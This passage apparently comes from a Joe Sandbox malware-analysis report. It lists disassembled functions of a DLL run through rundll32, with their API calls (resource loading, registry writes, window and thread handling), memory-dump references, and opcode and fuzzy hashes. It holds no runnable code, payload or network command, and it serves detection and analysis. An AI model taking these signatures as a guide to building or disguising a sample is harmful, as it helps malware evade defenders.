                                                                                                                                    • Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
                                                                                                                                    • Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                                    • Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10015123 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                                      • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                                    • __strdup.LIBCMT ref: 1001514C
                                                                                                                                    • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4206445780-0
                                                                                                                                    • Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                                    • Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
                                                                                                                                    • Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                                    • Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10017709 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                                    • _swprintf.LIBCMT ref: 10017768
                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4210924919-0
                                                                                                                                    • Opcode ID: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                                    • Instruction ID: e9188d0bda7618ab121d067f9e2349c71729dbb6fdaec1ca83b1d39ed15240a7
                                                                                                                                    • Opcode Fuzzy Hash: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                                    • Instruction Fuzzy Hash: A901C072500219FBEB00DF648D85FAFB3BCEF09704F010429FA05EB181EAB0E90187A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10017C4C Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                                    • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1078018258-0
                                                                                                                                    • Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                                    • Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
                                                                                                                                    • Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                                    • Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002665D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3354205298-0
                                                                                                                                    • Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                                    • Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
                                                                                                                                    • Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                                    • Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10021616 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                                    • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                                    • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3704204646-0
                                                                                                                                    • Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                                    • Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
                                                                                                                                    • Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                                    • Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100155B8 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • GetFocus.USER32 ref: 10015607
                                                                                                                                    • GetParent.USER32(?), ref: 10015615
                                                                                                                                    • SendMessageA.USER32 ref: 10015628
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4211600527-0
                                                                                                                                    • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                                    • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                                    • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                                    • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001B96E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                                    • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2353593579-0
                                                                                                                                    • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                                    • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                                    • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                                    • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001B32D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                                    • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                                      • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                                    • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 369458955-0
                                                                                                                                    • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                                    • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                                    • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                                    • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1003C9F5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                    • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                    • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                                    • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                                    • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002BC31 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                                    • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3384502665-0
                                                                                                                                    • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                                    • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                                    • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                                    • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1003A545 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                                      • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                                    • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                                    • __lock.LIBCMT ref: 1003A581
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                                    • InterlockedIncrement.KERNEL32(00501520), ref: 1003A5C9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2880340415-0
                                                                                                                                    • Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                                    • Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
                                                                                                                                    • Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                                    • Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001DC85 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,67083A02), ref: 1001DCB3
                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,67083A02), ref: 1001DCC0
                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,67083A02), ref: 1001DCDB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1078018258-0
                                                                                                                                    • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                                    • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                                    • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                                    • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100174CD Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                                    • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                                    • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                                    • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                                      • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ActiveEnable$FreeResource
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 253586258-0
                                                                                                                                    • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                                    • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                                    • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                                    • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002E206 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                                    • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                                    • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                                    • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                                      • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                                      • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
